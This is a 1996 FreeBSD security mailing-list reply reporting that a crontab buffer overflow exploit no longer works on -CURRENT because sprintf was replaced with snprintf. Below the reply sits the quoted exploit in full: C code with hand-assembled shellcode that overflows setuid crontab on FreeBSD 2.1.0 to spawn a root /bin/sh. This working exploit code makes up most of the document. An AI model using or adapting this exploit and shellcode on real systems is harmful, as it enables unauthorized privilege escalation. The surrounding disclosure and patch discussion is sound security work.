From owner-freebsd-security Mon Dec 16 14:01:06 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA06598 for security-outgoing; Mon, 16 Dec 1996 14:01:06 -0800 (PST) Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA06585 for ; Mon, 16 Dec 1996 14:00:59 -0800 (PST) Received: from Mailbox.mcs.com (Mailbox.mcs.com [192.160.127.87]) by Kitten.mcs.com (8.8.2/8.8.2-biteme) with ESMTP id PAA16117; Mon, 16 Dec 1996 15:58:47 -0600 (CST) Received: from Jupiter.Mcs.Net (karl@Jupiter.mcs.net [192.160.127.88]) by Mailbox.mcs.com (8.8.2/8.8.2) with ESMTP id PAA20334; Mon, 16 Dec 1996 15:58:45 -0600 (CST) Received: (from karl@localhost) by Jupiter.Mcs.Net (8.8.2/8.8.2) id PAA19217; Mon, 16 Dec 1996 15:58:42 -0600 (CST) From: Karl Denninger Message-Id: <199612162158.PAA19217@Jupiter.Mcs.Net> Subject: Re: Exploit for crontab bug (FreeBSD 2.1.0). To: leshka@leshka.chuvashia.su Date: Mon, 16 Dec 1996 15:58:42 -0600 (CST) Cc: BUGTRAQ@NETSPACE.ORG, security@freebsd.org In-Reply-To: <199612142224.BAA00961@leshka.chuvashia.su> from "Leshka Zakharoff" at Dec 15, 96 01:24:02 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk (exploit elided) This does not run on -CURRENT with crontab build dates after about mid-October. A perusal of the source shows that the evil sprintf was replaced by snprintf, and that therefore the buffer overwrite should (and appears to in fact) fail. -- -- Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity http://www.mcs.net/~karl | T1's from $600 monthly to FULL DS-3 Service | 33 Analog Prefixes, 65 ISDN, Web servers $75/mo Voice: [+1 312 803-MCS1 x219]| Email to "info@mcs.net" WWW: http://www.mcs.net/ Fax: [+1 312 248-9865] | 2 FULL DS-3 Internet links; 400Mbps B/W Internal > /* ---------------------------- CUT HERE ----------------------------------- */ > /* */ > /* Hi ! */ > /* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0). */ > /* If you have any problems with it, drop me a letter. */ > /* Have fun ! */ > /* */ > /* */ > /* ---------------------- */ > /* --------------------------------------------- */ > /* ----------------- Dedicated to my beautiful lady ------------------ */ > /* --------------------------------------------- */ > /* ---------------------- */ > /* */ > /* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su */ > > #include > main() > { > #define length 353 > int i,j; > unsigned long start_addr; > char *env[]={NULL}; > char param_string[length]; > char code_string[]= > { > "\xeb\x2a" /* jmp cont */ > > /* geteip: */ "\x5d" /* popl %ebp */ > "\x55" /* pushl %ebp */ > "\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */ > "\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */ > "\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */ > "\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */ > "\xff\x45\xef" /* incl 0xffffffef(%ebp) */ > "\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */ > "\xc3" /* ret */ > > /* 0xffffffe0(%ebp): */ "/bin/sh" > /* 0xffffffe7(%ebp): */ "\x01" > > /* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */ > "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */ > > /* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */ > "\xe8\xcb\xff\xff\xff" /* call geteip */ > "\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */ > "\x55" /* pushl %ebp */ > "\x55" /* pushl %ebp */ > "\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */ > "\x55" /* pushl %ebp */ > "\xe8\xd4\xff\xff\xff" /* call execve */ > }; > > for(i=0;i start_addr=0xefbfddf0; > *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr; > strncpy(¶m_string[200],code_string,strlen(code_string)); > *( (unsigned long*) ¶m_string[348])= start_addr; > > execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL); > > } > /* ---------------------------- CUT HERE ----------------------------------- */ > >